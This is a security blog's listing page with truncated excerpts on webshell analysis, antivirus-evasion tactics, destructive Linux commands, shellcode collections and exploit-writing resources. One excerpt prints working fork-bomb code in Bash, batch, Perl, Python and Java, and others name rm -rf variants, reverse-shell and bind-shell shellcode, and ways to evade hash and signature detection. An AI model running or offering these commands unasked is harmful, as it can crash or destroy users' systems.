Posts

Decryption and Analysis of a "Shell" Backdoor

UPDATE [1]: shortly after finishing this post, I decided to do a couple of scans of the raw code. The results returned several Shell Trojan variants, some doing permanent damage to Windows systems. Reports available at ~] VirusTotal [~ and ~] Malwr [~. Thanks to both services for the great results. It attempted network connections with the original URL, no surprise from a webshell, IMO; only a bit strange that the likely 0wn/Op would keep such a trophy case in the wild like that? I mean really?? I would've expected an HTTP request or a few, since that's who was hosting the assets, but the requests were made to connect to "Hostthshellcode" and then start the endless streaming of the v1c's data and a continual stream of fresh code for the mal to swap out. This only confirmed the feeling I had about the src code. Multiple langs being used, illogical syntax and it's all just mixed together... if anyone can answer how this can support the back and forth exec using Perl,

Malware and Successful AV Evasion Tactics

The malware ideology, and even its entire methodology, has morphed over the last year or so. It was decided to write a piece to offer some clarity on the idea of "AV evasion". There seems to be little in-depth working knowledge of the various techniques actually used. Time for a quick lesson to give more definition to this increasingly popular malicious scripting. Below is a list of some of the current successful antivirus evasion tactics used by malware. Hash modification: one way AVs detect whether a file is (or contains) known malware is by calculating the file hash. Malware avoids this detection by changing a single bit in the binary, which changes the hash and lets the file evade any hash-based detections. Specific malware signatures: some signatures are specifically designed to catch an exploit, or otherwise key on specific behaviours. By reversing the signature, it is possible to modify the malware so that no matching patterns remain in it. Just one exam

Twelve Unique Linux Commands that Should Never be Used

After implementing a fork bomb in eleven different language implementations ~] the tuto [~, I got inspired to revisit the few strings that, when executed in the Linux terminal, can be all kinds of destructive to the host. I'm not re-inventing the wheel here. Many of you probably know them (and the variants); there's nothing new here. However, it's good practice to review these types of things from time to time. So enjoy, but do not run any of these on your system. I have provided descriptions for each, discussing what the results will be if you make a mistake. If these are new to you, understand the precautions, and do not use any of these. Thank you. rm -rf: The rm -rf command is a simple, low-level command and one of the fastest ways to delete files, directories and their contents. But a little ignorance of the command's options may result in an unrecoverable system, even damaged hardware. Some of the destructive options used with rm are: rm //* base command used to delete files.

Fork bomb in several language implementations

For anyone who has worked with Linux for any amount of time, the term fork bomb will be familiar. However, it's not just a terminal command. Below are some implementations in other languages, followed by mitigation tactics for Linux distros.

BASH
$ :(){ :|: & };:

.sh (shell file)
#!/bin/bash
./$0|./$0&

.bat (Windows batch implementation)
:TOP
start "" %0
goto TOP
~OR~
%0|%0
# below is the same, but done on the command line using ^ to escape specials:
echo %0^|%0 > forkbomb.bat
forkbomb.bat

.pl (Perl implementation)
#!/bin/perl
perl -e "fork while fork" &

.py (Python implementation)
#!/bin/py
import os
while 1:
    os.fork()

(Java implementation)
public class ForkBomb {
  public static void main(String[] args) {
    while (true) {
      Runtime.getRuntime().exec(new String[]{"javaw", "-cp", System.getProperty("java.class.path"), "ForkBomb"});
    }
  }
}

.js (Jav

Excellent exploit writing resources and a large Shellcode db

A little collection I've put together for the craft of exploit writing and shellcode use. Guide books, resources and one large Shellcode DB for the finish (bottom link).
Stack-based Windows Buffer Overflow
A large collection of Exploit Tutos by our friends at Fuzzy Sec
Windows Exploit Development using the Immunity Debugger. Thanks to Sift Security
Shellcoder's Handbook
0x2 exploit tuto - Web hacking with BurpSuite
0x7 exploit tuto - web scanning and exploitation
Shellcode source repo, a large collection of code by category, with exploit name and description.
Cheerz... d_c0

Another Journey into a Malicious Abyss

This anonymous submission came to us a few days ago, only with the knowledge that this payload tripped and was dropped by an Enterprise-level A/V appliance. The 'submitter' got their hands on it and asked us to break it down. For this project, I enlisted the help of F1re_W1re, a very good c0d3r as well as a very good brother. We have worked together many times in the past, with nothing but amazing results. When a second set of eyes or a decoded iteration is needed, he is my go-to. A hat tip to you, Sir. This project was a true collaboration of skillz, for which I graciously thank him for his role as primary contributor. For reasons, I assumed the role of Project Manager (PM) and Lead Consultant. This was solved by both of us doing our part and offering input and direction as needed. Often it takes another set of eyes to see what's there (or just not apparent). You will get what I mean later on. Let's get at it!! After acquiring the sample, it was clear th

New 2017 Shellcode | Titles -- Link Direct to Code

I've compiled a list of the most current shellcodes and linked each directly to its raw code. I am providing this list for analytical purposes to those who may be interested. Enjoy and use responsibly...
Windows x64 password protected bind shellcode.
Windows x64 CreateRemoteThread() DLL injection shellcode.
Linux/x86_x64 mkdir("ajit", 755) shellcode.
Linux/x86_64 shellcode that binds to TCP/5600.
Linux/x86_64 execve /bin/sh shellcode.
Linux multi/dual mode execve("/bin/sh", NULL, 0) shellcode.
Linux multi/dual mode reverse shell shellcode.
Linux/x86 reverse TCP alphanumeric staged shellcode.
Linux dual / multi mode bind shell shellcode.
Windows x86 protect process shellcode.
Linux reverse shell shellcode.
Linux x86-64 egghunter shellcode.
Linux x86_64 random listener
Windows x86 executable directory search shellcode.
RSA Asymmetric Polymorphic Shellcode.
Windows x86 reverse TCP staged alphanumeric shellcode.
Linux x86_64 polymorphic setui

Various 'must have' Online Tools for Sec, pt 1

There are two updates to this post (shown in white)... UPDATE: another good online static malware analysis tool we all know and love is back up and running. Based on the Cuckoo Sandbox: ~] Malwr.com [~. There are many tricks and trade secrets that we (or anyone within cybersec) just don't share. We have decided that some online tools are just too good to keep secret. If they do, they aren't around for long; a kind of respect thing. I have another shortlist of very handy online tools at the bottom of our most recent reversing and analysis post, ~] decoding a malicious webshell [~. These play a big part in our processes and are used several times daily. Some of the tools below you may be familiar with, or not, or maybe even use already. If not, you should commit these to memory. Trust us, these will always come in handy. This is only a shortlist; we will add more/update as appropriate. The first you hopefully are quite familiar with; if you are not using this religious